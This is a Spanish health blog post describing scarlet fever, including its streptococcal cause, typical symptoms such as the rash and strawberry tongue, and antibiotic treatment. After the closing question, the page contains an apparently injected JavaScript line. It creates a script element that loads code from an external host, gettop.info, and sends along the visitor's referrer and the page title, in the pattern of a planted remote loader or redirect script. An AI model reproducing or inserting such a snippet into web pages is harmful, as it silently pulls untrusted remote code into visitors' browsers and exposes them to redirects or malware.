Salud y belleza » Enfermedades, Medicina, Salud

La fiebre escarlatina no es una enfermedad del pasado

Sin Comentarios

escarlatinaMuchos se sorprenden al escuchar hoy en día de nuevos casos de pacientes que padecen fiebre escarlatina. Aunque se considera que es una enfermedad del pasado, lo cierto es que siguen apareciendo casos graves en la actualidad, aunque no con tan fatales consecuencias como hace unos años.

La escarlatina se produce por una invasión de una bacteria llamada estreptococo que entra por la garganta por contagio directo entre personas. Este estreptococo libera una toxina que circula por la sangre causando fiebre y sarpullido. Después de unos 2 a 5 días aparecen los primeros síntomas.

La mayoría de los casos de escarlatina se dan en niños de entre 2 y 10 años. En personas mayores es más difícil, pero también se han detectado casos. El primer síntoma de la escarlatina es la fiebre alta, que aparece bruscamente. Después aparecen los vómitos, escalofríos, dolor de cabeza y de garganta.

Unos días más tarde aparecen los sarpullidos rojos que forman puntitos por el cuello, el tronco, la axila y que pueden llegar a la cara y a las extremidades. También la lengua experimenta cambios y puede pasar a tener un aspecto rojizo cubierto con un revestimiento blanquecino que le da apariencia de fresa.

Después de una semana, el sarpullido empieza a desaparecer y la piel se descama o se pela. Esto dura unos días. El tratamiento de la escarlatina se basa en antibióticos orales que debe recetar el médico y la cura suele ser completa.

¿Has conocido a alguien que haya tenido escarlatina?

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.